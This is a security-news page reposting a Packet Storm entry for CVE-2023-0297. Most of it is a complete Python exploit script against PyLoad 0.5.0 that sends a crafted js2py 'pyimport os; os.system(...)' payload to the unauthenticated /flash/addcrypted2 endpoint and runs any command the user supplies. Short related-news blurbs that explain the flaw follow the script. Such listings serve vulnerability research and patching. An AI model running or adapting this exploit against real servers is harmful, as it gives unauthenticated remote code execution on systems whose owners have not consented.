Security
Headlines
HeadlinesLatestCVEs

Headline

PyLoad 0.5.0 Remote Code Execution

PyLoad version 0.5.0 suffers from an unauthenticated remote code execution vulnerability.

Packet Storm
#vulnerability#mac#ubuntu#git#rce#auth
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)# Date: 06-10-2023# Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe)# Vendor Homepage: https://pyload.net/# Software Link: https://github.com/pyload/pyload# Version: 0.5.0# Tested on: Ubuntu 20.04.6# CVE: CVE-2023-0297import requests, argparseparser = argparse.ArgumentParser()parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')arguments = parser.parse_args()def doRequest(url):    try:        res = requests.get(url)        if res.status_code == 200:            return True        else:            return False    except requests.exceptions.RequestException as e:        print("[!] Maybe the host is offline :", e)        exit()def runExploit(url, cmd):    endpoint = url + '/flash/addcrypted2'    if " " in cmd:        validCommand = cmd.replace(" ", "%20")    else:        validCommand = cmd    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)    print('[+] The exploit has be executeded in target machine. ')def main(targetUrl, Command):    print('[+] Check if target host is alive: ' + targetUrl)    alive = doRequest(targetUrl)    if alive == True:        print("[+] Host up, let's exploit! ")        runExploit(targetUrl,Command)    else:        print('[-] Host down! ')if(arguments.url != None and arguments.cmd != None):    targetUrl = arguments.url    Command = arguments.cmd    main(targetUrl, Command)

Related news

Vulristics News: EPSS v3 Support, Integration into Cloud Advisor

Hello everyone! This episode and will be about latest news in my Vulristics project. EPSS v3 The third iteration of the Exploit Prediction Scoring System (EPSS) was released in March. It is stated that EPSS has become 82% better. There is a pretty cool and detailed article about the changes. For example, EPSS Team began to analyze not 16 parameters […]

pyLoad js2py Python Execution

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and can not be used by external hosts. A secondary Click N Load service runs on port 9666 and can be used remotely without authentication.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution